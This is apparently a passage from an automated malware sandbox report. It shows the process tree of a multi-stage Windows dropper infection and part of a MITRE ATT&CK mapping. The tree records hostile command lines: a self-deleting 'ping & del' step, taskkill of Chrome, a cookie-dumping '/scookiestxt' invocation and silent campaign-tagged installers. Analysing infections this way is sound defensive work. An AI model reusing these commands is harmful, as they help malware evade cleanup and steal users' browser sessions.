                                                                                                                                                                                                                                                                                            PID:8812
                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\setup.exe
                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\setup.exe"
                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                PID:4384
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\Company\NewProduct\setup.exe"
                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                    PID:6116
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 3
                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                      PID:408
                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                    PID:7116
                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                        PID:5888
                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe
                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe"
                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                        PID:5156
                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\pwang.exe
                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\pwang.exe"
                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                          PID:4376
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\u3Y4Zy0CYWOPx2pVZHYYzBXv.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\u3Y4Zy0CYWOPx2pVZHYYzBXv.exe"
                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                          PID:8896
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\STSWAQWtfnHVzA0IrbF2vGa1.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\STSWAQWtfnHVzA0IrbF2vGa1.exe"
                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                            PID:8960
                                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                PID:7716
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7Li4B7nXp030gX2ytxwES7R8.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7Li4B7nXp030gX2ytxwES7R8.exe"
                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                PID:6732
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\3yBEKHxEu0oEPCuGLyfxxgJL.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\3yBEKHxEu0oEPCuGLyfxxgJL.exe"
                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                  PID:9200
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 9200 -s 1484
                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                    PID:5620
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\A6CcumG02LkoHyk3qWJ3b7KI.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\A6CcumG02LkoHyk3qWJ3b7KI.exe"
                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                    PID:9188
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "1_4924807894722937236.exe" /f & erase "C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe" & exit
                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                      PID:6000
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                                                                                        taskkill /im "1_4924807894722937236.exe" /f
                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                        PID:7288
                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe
                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe"
                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                      PID:4820
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                          PID:5844
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                            PID:8488
                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe
                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe"
                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                          PID:4892
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\4084188.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\4084188.exe"
                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                              PID:1420
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1694242.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1694242.exe"
                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                PID:8168
                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                                                                                                                                                  "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                    PID:5564
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4678045.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4678045.exe"
                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                    PID:8380
                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                                    PID:4544
                                                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                    PID:3984
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                      PID:6108
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                    PID:2432
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                    PID:4588
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                    PID:6944
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                    PID:1188
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                    PID:7320
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                    PID:5076
                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding E7D379ACA8399E0267BC12BE6E79AC98 C
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      PID:4220
                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding C6027A67627F613F14A5C294EC4FA08F
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      PID:5676
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                        PID:5928
                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding EA0332F93907B8647A748612BB5E292D E Global\MSI0000
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:8908
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:7076
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:7008
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-8VIDN.tmp\LabPicV3.tmp
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-8VIDN.tmp\LabPicV3.tmp" /SL5="$20454,506127,422400,C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:6784
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-V7SJG.tmp\3316505.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-V7SJG.tmp\3316505.exe" /S /UID=lab214
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:6400
                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Windows NT\ARSMDGGYST\prolab.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Windows NT\ARSMDGGYST\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:7840
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-9O1B9.tmp\prolab.tmp
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-9O1B9.tmp\prolab.tmp" /SL5="$20338,575243,216576,C:\Program Files\Windows NT\ARSMDGGYST\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                        PID:4436
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\cb-38b08-de1-0e980-1c0e1ee04d73c\Nuvapucyru.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\cb-38b08-de1-0e980-1c0e1ee04d73c\Nuvapucyru.exe"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:4088
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\da-7b141-a4a-1fe9e-949c0aadaebd9\Jalirinari.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\da-7b141-a4a-1fe9e-949c0aadaebd9\Jalirinari.exe"
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:4528
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3taa5db4.4hv\KiffMainE1.exe & exit
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                              PID:6080
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3taa5db4.4hv\KiffMainE1.exe
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3taa5db4.4hv\KiffMainE1.exe
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7456
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2gzdaafg.5e5\001.exe & exit
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6660
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2gzdaafg.5e5\001.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\2gzdaafg.5e5\001.exe
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                      PID:3340
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zenba0zy.0qn\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                      PID:8912
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\zenba0zy.0qn\installer.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\zenba0zy.0qn\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                          PID:3084
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jdghm24q.lcr\gpooe.exe & exit
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:8836
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jdghm24q.lcr\gpooe.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jdghm24q.lcr\gpooe.exe
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5512
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:3864
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:8760
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5zjw3bmn.eo1\sskiper.exe /s & exit
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5236
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5zjw3bmn.eo1\sskiper.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\5zjw3bmn.eo1\sskiper.exe /s
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:2368
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\awmopoxt.c4z\google-game.exe & exit
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4576
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\awmopoxt.c4z\google-game.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\awmopoxt.c4z\google-game.exe
                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:3892
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oj22luyi.g5t\askinstall39.exe & exit
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:4524
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\oj22luyi.g5t\askinstall39.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\oj22luyi.g5t\askinstall39.exe
                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:2912
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hq3hho3g.urt\y1.exe & exit
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5660
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\hq3hho3g.urt\y1.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\hq3hho3g.urt\y1.exe
                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:9032
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\umdm3u2o.f2t\setup.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:6584
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\umdm3u2o.f2t\setup.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\umdm3u2o.f2t\setup.exe
                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:6184
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                                                                                                                                                              werfault.exe /h /shared Global\a75f08a9c40345f59ca2fc9165afe8ec /t 4324 /p 7008
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:2416
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8692.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\8692.exe
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:5288
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:3972
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding B6C04DBBF0FEAEF0CB5D671E5C24525D C
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:5444
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DE69.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\DE69.exe
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:4432
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BE47.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\BE47.exe
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5224
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:7804
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4EF0.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4EF0.exe
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:4344

                                                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                                                                                                                            BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1197

                                                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                                                            BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1197

                                                                                                                                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1130

                                                                                                                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                                                                                            Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1518

                                                                                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

